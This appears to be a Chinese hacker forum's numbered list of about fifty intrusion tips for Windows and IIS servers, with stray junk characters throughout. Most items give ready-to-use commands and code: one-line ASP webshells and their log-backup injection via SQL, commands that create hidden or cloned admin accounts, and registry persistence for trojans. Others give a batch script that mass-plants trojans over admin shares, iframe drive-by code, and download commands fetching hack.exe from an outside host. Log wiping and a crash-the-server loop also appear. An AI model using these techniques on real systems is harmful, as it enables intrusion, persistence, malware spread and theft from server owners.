1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,* w9 G. b) \: C2 p% m, a/ P
cacls C:\windows\system32 /G hqw20:R
: D1 z- {$ y# q- O' H思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入/ g% T! { i" \8 |
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F% T/ U' o( P1 T B
+ N% Y6 z+ J1 w" u+ F% [2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
8 T$ E' p' t- B0 W) T" g6 W R- N/ @$ n3 r- V
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
, @" `4 C( N ]4 b* n: y3 k5 U, Y' `6 k+ R% p; B7 ^8 ?
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
2 Z' x6 ?( D* V% P; [! |1 U9 w" S. |' N+ K& H4 c! x8 D3 [
5、利用INF文件来修改注册表3 ^3 d( M, P; e$ o/ D$ s
[Version]$ c$ l" H4 ?& A' B3 d& K4 S
Signature="$CHICAGO$"9 B* o) w/ ^2 |: p% g
[Defaultinstall]
# l) O: H# ~$ Y8 xaddREG=Ating1 `4 d6 |0 w! `1 z4 d* d
[Ating], R% v* z1 k% G, L' H G" N0 {- T" P
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
! i' n, }7 D" N! Q+ b9 F以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:, f8 V [% t3 x) P7 A
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径! g/ B/ E) g% k; V' v% m
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
, Y! d/ U6 ]& q, H6 UHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU0 Z' B4 g1 A' m5 B
HKEY_CURRENT_CONFIG 简写为 HKCC2 V! j' ^% o9 M5 k
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值% g% h, v7 u1 p3 S3 U* ^8 n I
"1"这里代表是写入或删除注册表键值中的具体数据
: m2 Q8 ^( `. O' E y& o
" }2 M& u4 C: X6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
, j) P6 h5 K# C/ ~. g多了一步就是在防火墙里添加个端口,然后导出其键值0 |( C: ~) Y1 r% N2 Q
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
% I" `5 O, ~# | l. S! P, F" }7 R
" Q. ]4 c. ~- b5 }$ j" M# V9 z5 L7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽# y) L4 N2 b, G7 I2 ~
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
( f g+ ~1 s9 u3 z9 Y0 F9 K% B( ^1 o$ S+ t
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。 F+ o2 I3 t! P, F! }8 e' E" M/ r
; H. j- b# U4 G: W
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
; Y/ i* k. b& @8 D4 a% t可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
6 e+ t7 h: q# t0 U' ?, S3 a
: X6 R, N5 b) }5 k" o3 u, ^10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
& R! @9 {7 f1 M @" E" ?4 q. V$ I+ S5 ]! [3 A" C/ b
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,; |6 w0 X6 r J1 Z, ], d! t- `( ~* \1 U
用法:xsniff –pass –hide –log pass.txt
4 C0 \6 A# j7 M! D) y6 V! x7 i" i7 Q+ D! f8 o, X" F6 d
12、google搜索的艺术
$ h+ k# m* Z) [6 @搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
% M# n( w9 v: |; U' O或“字符串的语法错误”可以找到很多sql注入漏洞。
, ?8 `% N. S- j0 ]9 u, I( F! [5 N
- q, U! F/ ~ Y+ _, A( F13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。 x- {' E& d& F+ `9 o0 t* C7 E
7 ? \ {3 C, r9 F0 r) f! B4 F4 u) N
14、cmd中输入 nc –vv –l –p 1987( z: }( R6 o2 J
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
E) m- Q7 @+ H% Z8 T3 ]; v
8 L/ t+ t/ s3 i+ u& K( m15、制作T++木马,先写个ating.hta文件,内容为
# z; {! U/ l7 C. ^<script language="VBScript">
A; l0 e6 o% v$ ?; U, _9 sset wshshell=createobject ("wscript.shell" )2 [0 V- z7 h7 F. _1 X
a=wshshell.run("你马的名称",1)+ o' o; U K7 f7 B
window.close
' v/ c# p7 N0 }$ E/ {+ P</script>/ R: h) [; M+ c/ C* s' {
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
, M. H9 g5 T# i
, r! t8 L1 ^3 S2 B# D& D16、搜索栏里输入2 U) u3 ?7 G, n8 r+ Z
关键字%'and 1=1 and '%'='
6 x! u0 R! W" {* f0 k关键字%'and 1=2 and '%'='
3 o$ z9 q* s1 {% e+ L比较不同处 可以作为注入的特征字符
$ H% q* l1 ^: n! t S
E$ _: b7 O2 Z1 ?' _ P17、挂马代码<html>
0 M s: U7 I1 r<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe># f2 {: Z% q: J( E
</html>
: r" a& p# k' F; \8 Q* M, w+ k
6 N6 f! ?6 u. ]6 p% K8 w( T18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,1 `; |4 J9 e3 e1 _! |8 U8 n
net localgroup administrators还是可以看出Guest是管理员来。2 k, D: T8 j) y6 R
+ ?% A. G) i. h: f% _4 E19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等+ o b- ^ n0 _6 G: w
用法: 安装: instsrv.exe 服务名称 路径
- S6 V5 t0 e9 l卸载: instsrv.exe 服务名称 REMOVE
- g1 i- E: |4 k$ ?$ s
$ y9 f2 C l3 s2 @2 `9 I5 }4 ~2 B- v! l* U
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉1 N+ o6 S" U6 t
不能注入时要第一时间想到%5c暴库。& X% n- C7 y/ b/ f
( D+ W4 O; u: J! A! p22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
5 l/ Z7 C0 k/ ^/ a1 j2 W/ P3 E0 F0 V6 k- A& h# I5 n& `# N
23、缺少xp_cmdshell时4 D2 B3 m/ w: x% U
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'& L P' j0 F& D
假如恢复不成功,可以尝试直接加用户(针对开3389的)
, O8 U7 g$ I& ^" b& O5 w9 hdeclare @o int% E4 ], g5 B2 n; O0 H
exec sp_oacreate 'wscript.shell',@o out: X" H7 m1 V9 Z) D8 f7 I' }+ p
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员+ c% s8 d0 H) B# f3 x9 `% y. v
+ S* l2 s# q1 {- P/ k24.批量种植木马.bat
( Y+ t9 a+ Z$ G. w: B+ ?for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中) S$ \2 j8 v5 D" ^4 P) C( V
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间; |! `/ Z3 F3 f7 W, s( X" e
扫描地址.txt里每个主机名一行 用\\开头( Q" T/ \3 x" `' l
# P6 {5 ^# N- g7 Y* K25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。& K6 H/ x2 X" U! ?! m
# R$ {" _' ?2 @' l
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
8 ^& e2 y8 K2 _. E& G* X0 `# _将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
6 T/ _! o8 z4 ^* }9 j7 [.cer 等后缀的文件夹下都可以运行任何后缀的asp木马& d% W8 U0 x" T) y$ ^8 i
/ A) o& d7 d8 Y$ r5 E27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
1 r7 a. E: V+ m4 q0 A/ a3 j然后用#clear logg和#clear line vty *删除日志( u; g: V; G. x" B( i3 {7 a# j& u
. k3 a: f* d) N. I0 D- L28、电脑坏了省去重新安装系统的方法
; v8 }1 ?) ]* C- w: |7 X' Q( ]6 J纯dos下执行,
! W- A( D D* p& C$ y- gxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
) Z3 t8 V/ o% D( T+ @7 G2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config6 L& s8 u* o3 |2 _) y, ]2 m& |
4 `5 y% }/ L3 y/ d2 e+ z
29、解决TCP/IP筛选 在注册表里有三处,分别是:
4 m" d2 t3 {& z# T4 KHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
( n; L( ] X& V0 Y# L7 q$ a5 f3 c) H; tHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip2 |# l" B9 { T7 F: m5 E+ o
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
: g. v3 d# P" a1 P( y$ Q, c分别用
0 y$ { B' _( ^regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6 m5 I6 @# t0 R. t' g
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip, m6 H# u4 O6 G# p" D h
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip/ D$ K; s2 q- t+ q! f1 R0 a, V
命令来导出注册表项
9 g! \" H- W9 X然后把三个文件里的EnableSecurityFilters"=dword:00000001,5 y6 w u( b; t
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用) g$ ^( E( k, q$ c7 i
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。- w% j; [+ W5 \ e$ o' [" v' E
3 O0 _ A4 N/ H, T0 ]30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
7 N" A& ^7 k- W: N; BSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3% N0 c. V, @7 @- }3 H6 \5 Y* V
& Z% H( d9 J2 Q; P7 x0 @9 q% D
31、全手工打造开3389工具( h& |! O7 d" h, z
打开记事本,编辑内容如下:. a, T+ V( R) B9 ?- Y
echo [Components] > c:\sql- B* e3 v5 Q+ o
echo TSEnable = on >> c:\sql
: p9 j/ N/ D# E) tsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
, D, A- Q% ]+ r1 e2 I8 u U编辑好后存为BAT文件,上传至肉鸡,执行5 G" X C* {" o; [1 f+ d
7 N$ H' q# E* ]6 @7 J* o
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马! O. @, i1 P0 N" ~
1 z( z+ w: x! R& p
33、让服务器重启
, ]; Q9 Z/ v8 x5 A+ }写个bat死循环:
+ G8 c0 `3 {3 y+ P4 z. ] u6 J3 n7 j@echo off
& V7 x) ?& F4 _6 }( a Y:loop1
2 @2 ?! u8 S6 K# mcls
" t4 Q R G) g8 lstart cmd.exe! R9 O% g+ T; _- m3 `1 t% F8 I
goto loop1
, J" B7 S" _2 c( K( m保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
+ a0 `: ~; [. M6 j; S* T9 _6 Q& }& o E9 O9 l
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,# Q% p7 }# R6 @4 u* v3 i$ H
@echo off# ^5 G3 B; m" s5 E8 h% Z6 Z
date /t >c:/3389.txt/ `7 z9 ^7 z+ T" M
time /t >>c:/3389.txt
% n" F* ?) g8 z: O! |attrib +s +h c:/3389.bat
7 j, j" I1 J2 v1 dattrib +s +h c:/3389.txt
& d7 F) v& u% bnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
/ c+ x# I% g& X# ~' l" Q并保存为3389.bat
( J- @7 `# Z% U打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号- u7 L: I& ~* y" E$ ~/ O
, @5 n( J& d6 C2 ]( y$ n35、有时候提不了权限的话,试试这个命令,在命令行里输入:9 F8 Z" ^% Z! c/ N
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页). t1 z! l9 o$ t6 U2 X3 Y* Z) u B
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
1 y0 ~* N w A% k* m% F' L7 P1 r
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
) g2 F) F- ^2 ?4 _echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址& U. L. t$ A' m3 c/ c
echo 你的FTP账号 >>c:\1.bat //输入账号
2 {$ w, C: d% ]echo 你的FTP密码 >>c:\1.bat //输入密码/ e% E u) K$ j
echo bin >>c:\1.bat //登入* {' U& Y* U- k# s6 [
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么5 T. X( t7 A3 F; W" C/ a% j4 G% t" q
echo bye >>c:\1.bat //退出
! r7 {, A3 ~& Z6 o3 z) j* b然后执行ftp -s:c:\1.bat即可
! G7 _# v# U/ J9 a) W, p( ]0 j. J7 h8 G" A- ]
37、修改注册表开3389两法+ d& S# U. d1 d; j2 d# Y
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
_8 E) Y: }& Q6 y" pecho Windows Registry Editor Version 5.00 >>3389.reg- P. B% U5 V) Q
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
- P! d5 N, L; n0 }7 X# w' x+ a5 d- Qecho "Enabled"="0" >>3389.reg
" {" f/ g N% @8 b9 B% B+ [echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows+ k7 w, B( E1 p0 }3 \
NT\CurrentVersion\Winlogon] >>3389.reg
% i- C8 c3 h7 S, Secho "ShutdownWithoutLogon"="0" >>3389.reg
6 ~; ]; i" w2 X- A6 J8 V3 Y% hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]7 G* \" j1 g- k, D3 E6 Y3 W
>>3389.reg
4 J2 @. K) y* h5 K2 a, ?6 O3 vecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg7 ]" P# \. H" [5 G
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] }" D4 l; t8 s$ V
>>3389.reg2 L1 Z3 ^/ c6 x7 ]8 E
echo "TSEnabled"=dword:00000001 >>3389.reg% X) f3 F% q0 d! M2 Z# x* k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg3 R. H, N. ?. r5 p
echo "Start"=dword:00000002 >>3389.reg
' @% S9 M& J5 eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
1 A+ R4 a7 p0 f u! H+ v9 N>>3389.reg
7 n8 |2 g8 b) a1 zecho "Start"=dword:00000002 >>3389.reg
: c+ p9 m% N Necho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg* M. ?1 g$ T2 e+ H+ A& w6 [. P5 J
echo "Hotkey"="1" >>3389.reg
; R4 i% D% r8 Z& [7 _echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
" o0 j9 z2 m3 @/ D! a1 C; IServer\Wds\rdpwd\Tds\tcp] >>3389.reg
) C1 _, X+ d; p6 M1 E2 w8 H+ k- {echo "PortNumber"=dword:00000D3D >>3389.reg
% f: V) p8 p6 J3 ?echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal( `. B5 x( _) l: z: T: k: d- `$ x
Server\WinStations\RDP-Tcp] >>3389.reg
7 Y# n5 N1 g: C, recho "PortNumber"=dword:00000D3D >>3389.reg
& {- b/ \6 `& L$ V, v0 J* t. C' C) g把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。8 S, A, w9 c0 A/ S2 u, a& t$ Y
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)3 g2 V% Q( x' j: ]2 Z* ~
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效) J' a1 u0 t$ y% t! k% h$ P* W
(2)winxp和win2003终端开启6 K# k. \/ M5 X, l
用以下ECHO代码写一个REG文件:7 j6 l6 l' |8 `
echo Windows Registry Editor Version 5.00>>3389.reg
( p+ e- e% |2 yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
6 b! B( J5 j6 |# p, o- Y9 E/ d- CServer]>>3389.reg
t+ A( w2 s, ~! P8 ]' Cecho "fDenyTSConnections"=dword:00000000>>3389.reg! B! a% Z: J; c( x1 w
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
( w, G8 W# C4 d2 x7 m* HServer\Wds\rdpwd\Tds\tcp]>>3389.reg6 L5 U2 c) G( d+ H0 U$ {( n) s
echo "PortNumber"=dword:00000d3d>>3389.reg7 a/ J! H5 J5 T+ s- }; ?7 A/ c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal/ a, h& t; Y2 k- Y4 N* }" G
Server\WinStations\RDP-Tcp]>>3389.reg7 L. E3 O# q1 l' E* _- m
echo "PortNumber"=dword:00000d3d>>3389.reg
6 x. ~+ G; a2 W9 l) Z5 A" G: ~然后regedit /s 3389.reg del 3389.reg6 x6 e. P" C E5 G
XP下不论开终端还是改终端端口都不需重启& o9 N' z2 W' X9 e7 p' I: n1 ]
+ `+ d- v' r- {9 Z& D/ k5 w3 q38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃/ j& D$ X0 ]7 U: F) M
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
! V! w3 A8 T$ V9 d
* M& U( w/ l& J4 L: r8 c' F% t9 v39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
: r5 g7 ^/ A3 j4 I# t. J9 i8 Q(1)数据库文件名应复杂并要有特殊字符
7 \# R0 b+ z T" k' L/ L(2)不要把数据库名称写在conn.asp里,要用ODBC数据源6 n, X/ U" U( W+ H7 A, r9 S
将conn.asp文档中的) v. Q: [! `$ d( V
DBPath = Server.MapPath("数据库.mdb")
0 d6 U( _4 u% S; C6 S3 Pconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath- L7 u, L5 {" E2 Z. G( x
" A: S/ E4 y. Z
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
+ K' i+ o* T f1 F(3)不放在WEB目录里" a5 m. T, r6 Y% {* E
' O% f/ P3 C: ]) U0 z40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
* Y# `1 D3 I c- J1 A1 W/ }5 W可以写两个bat文件/ H. G6 x% ^8 V
@echo off6 s; W, Y8 e2 c+ G
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
2 A5 Z( k* h6 ] o: O/ N, J6 ^; Z@del c:\winnt\system32\query.exe" D, W6 l3 P# t, k7 A
@del %SYSTEMROOT%\system32\dllcache\query.exe$ a2 c9 B6 E- C9 ?
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的& [5 j( `" P9 K! ^
: X. V+ ]; a6 p8 u
@echo off1 h' d6 t2 O% w; z: @
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe+ A1 M+ H4 w& X9 ~' P) o
@del c:\winnt\system32\tsadmin.exe) y$ W+ ^( d, a2 _0 n# e, K8 \
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
) r. z& V# r' A
2 W1 Z8 T+ Q6 f3 P7 N( a- q41、映射对方盘符0 i5 n' _# y( ]% _
telnet到他的机器上,
2 w% E' h; [- e. C; anet share 查看有没有默认共享 如果没有,那么就接着运行/ B, }2 \- v9 N( N6 b6 P S
net share c$=c:4 `' m% i+ {" _) D$ u: H: X5 W0 [
net share现在有c$
5 l7 C; i* d6 }, R! p0 d在自己的机器上运行
: U1 i" f* B' H# @3 Knet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
g6 ^# ]$ z) t3 L. F
% p1 C1 s, Y9 H: H5 x8 J- g42、一些很有用的老知识/ [, @8 ?# w0 B- X4 g7 r3 Z4 K
type c:\boot.ini ( 查看系统版本 )$ v* c4 f+ T Q1 }; J
net start (查看已经启动的服务)
( G1 r: \3 \ W6 E( ]! W0 Squery user ( 查看当前终端连接 )
" b7 j! o0 }4 Q |. e# Lnet user ( 查看当前用户 )# z. v# F% P& c1 i. D
net user 用户 密码/add ( 建立账号 )
% O( [, C" } Y1 x' C2 {+ cnet localgroup administrators 用户 /add (提升某用户为管理员)1 _8 ~+ _* k8 k. t7 X* q2 a7 V; N3 w
ipconfig -all ( 查看IP什么的 )
& c& X) w: E( l6 Jnetstat -an ( 查看当前网络状态 )0 p6 v: G% F# m4 {0 _8 e: e! ?' M0 c
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)7 r7 U' V9 S2 [! a# d' v
克隆时Administrator对应1F4
' P: Y; p! e+ ^/ T, x y1 _guest对应1F59 m; Z4 i" D7 `6 Y4 B B
tsinternetuser对应3E8
. o9 @* h5 |0 ` U9 _! U9 q5 o/ O9 t6 f) G7 T
43、如果对方没开3389,但是装了Remote Administrator Service
+ D' H+ _& e* E用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接: W' p X3 ^% q
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
( R$ E+ K, r7 }$ }先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"" X, y2 N0 q8 ?5 z" F. A* ^
$ S- p. P+ g% B) v' ~
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)! K9 p0 _: m* s4 z
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)' |) `; _% D5 h6 ?0 q
( h. F4 k1 X3 A5 o45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入) f5 d. r% E; s( X% e
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
+ T; g8 K! |" h4 y- ^) l& a$ |: N^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
5 w8 h- R N3 n6 _8 bCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =- r$ V% Q) {, r% _- L: l1 ]
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs( a; N; T+ P1 V7 {& k
(这是完整的一句话,其中没有换行符)- [ ^& m' o# t
然后下载:
. G/ o1 o) p4 ?cscript down.vbs http://www.hack520.org/hack.exe hack.exe
, z6 Q& g* Y( q1 k* H1 |2 q- t4 {7 Z: c3 G
46、一句话木马成功依赖于两个条件:
6 f' Q/ i1 E0 ]3 x2 S7 |1、服务端没有禁止adodb.Stream或FSO组件
: p. f9 z; P3 S9 N" J4 ?+ n2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
# \& k# E+ y3 }
( `0 g2 }* [- }47、利用DB_OWNER权限进行手工备份一句话木马的代码:
/ i4 p- n: q7 O) g* a9 w% O;alter database utsz set RECOVERY FULL--
+ p( d: b; K0 h. x;create table cmd (a image)--$ ^1 d3 O1 s2 D9 Z8 C; l, R) @* r
;backup log utsz to disk = 'D:\cmd' with init--
9 D0 o! ?( A" w+ g% x;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--9 v3 |, W( Y9 p# p+ s: Q
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--7 {' K' P# ^8 n% l! b3 E
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
2 G' _! a' J) r% F5 F/ m/ U& C: u' N; J2 Y J
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:% q9 D; ^% Q9 d* B* x8 _ M
3 l$ Q) Z% q- C) ]8 I用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
- A: T) R# F. I) A: ]) L0 _所有会话用 'all'。
; [; ^2 d: o% c/ r# {1 h) ~% W-s sessionid 列出会话的信息。& q4 \+ a# B5 Q" `: Q% b9 M* e
-k sessionid 终止会话。) k, s: d7 F2 T8 W' A1 P
-m sessionid 发送消息到会话。9 S% G) E0 u" M3 I2 ?( a! @0 L
w& n4 O$ B% @$ L' Iconfig 配置 telnet 服务器参数。2 B0 E3 L* x, c+ N: Z9 { n7 ]
( b: w, W Y" }) P; E, Q
common_options 为:. B! F- Y( [/ t7 p: A2 f1 C
-u user 指定要使用其凭据的用户 Z/ `* @ ~; u6 B
-p password 用户密码
0 g8 B- ^1 c3 Q1 v0 @6 Y' X9 @$ N8 I9 i- r) u0 l1 C5 ^
config_options 为:3 N2 ?# R4 S) O3 O% u$ r' T
dom = domain 设定用户的默认域
T/ ]. A9 N: o$ r! ` Fctrlakeymap = yes|no 设定 ALT 键的映射
# ~ t: ]- f& E8 ~timeout = hh:mm:ss 设定空闲会话超时值
. l1 V) Z/ }# d btimeoutactive = yes|no 启用空闲会话。 \/ Y8 y2 _$ Y* ^- M& p9 r6 W
maxfail = attempts 设定断开前失败的登录企图数。/ {' R, p6 G3 b# a" c
maxconn = connections 设定最大连接数。
z- O+ Q4 s. x! r# zport = number 设定 telnet 端口。; }& }' V: H W! Z1 U0 ~! B
sec = [+/-]NTLM [+/-]passwd( Y3 g; `: c* \3 j( H
设定身份验证机构
' h: h% y4 M2 U+ Vfname = file 指定审计文件名。
! ~+ _2 h" d0 s x: J' Ffsize = size 指定审计文件的最大尺寸(MB)。" k' X' i, a3 C5 C8 j6 C
mode = console|stream 指定操作模式。 T( }1 m% Y% ]3 s
auditlocation = eventlog|file|both$ O9 R" [, _+ F0 U7 e% f
指定记录地点
! ?3 O. ^" y( R: `6 {3 e9 ~audit = [+/-]user [+/-]fail [+/-]admin
' _6 B: V, N/ d% b. g
3 a8 S* Z/ h8 F+ K( W49、例如:在IE上访问:" V' D6 h! V! O4 C1 f
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/+ C+ X& i+ J, M. V7 S6 a
hack.txt里面的代码是:
- o1 t; W5 Y# S6 f' s; F3 {<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">9 Y) J$ [6 _% F1 e) L1 R* ~
把这个hack.txt发到你空间就可以了!+ T( O5 u0 B4 |5 _. {, `
这个可以利用来做网马哦!7 m! x( M+ ]: H: P \, @
+ F6 ?# ^/ ], E8 o e. T" k1 l
50、autorun的病毒可以通过手动限制!
$ E: A7 L; v7 q' i! r/ m1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!4 V# l5 \! u: N
2,打开盘符用右键打开!切忌双击盘符~' `+ a/ o. g3 e7 i. g, M
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
- `6 I# [- j' r& u* X8 ] y% r. L9 o. V1 U2 |. M- {
51、log备份时的一句话木马:/ K( k8 f# p. z# i( e
a).<%%25Execute(request("go"))%%25>
" x' T' u0 J, y U, A5 V; nb).<%Execute(request("go"))%> R5 I! {0 q2 W4 l
c).%><%execute request("go")%><%
$ g* i9 ]. Q8 h4 _7 i0 b# D; kd).<script language=VBScript runat=server>execute request("sb")</Script>
; @, Y6 E) U; e% V8 Qe).<%25Execute(request("l"))%25>
4 H) X4 r! j) i) r0 gf).<%if request("cmd")<>"" then execute request("pass")%>$ A. F9 T& ]' n' m" B% f
& z% f$ Y0 h& ?3 [
52、at "12:17" /interactive cmd
7 j- A2 v4 m; S. N) m+ z4 W C执行后可以用AT命令查看新加的任务9 L' b- L; }& u+ K" g3 G
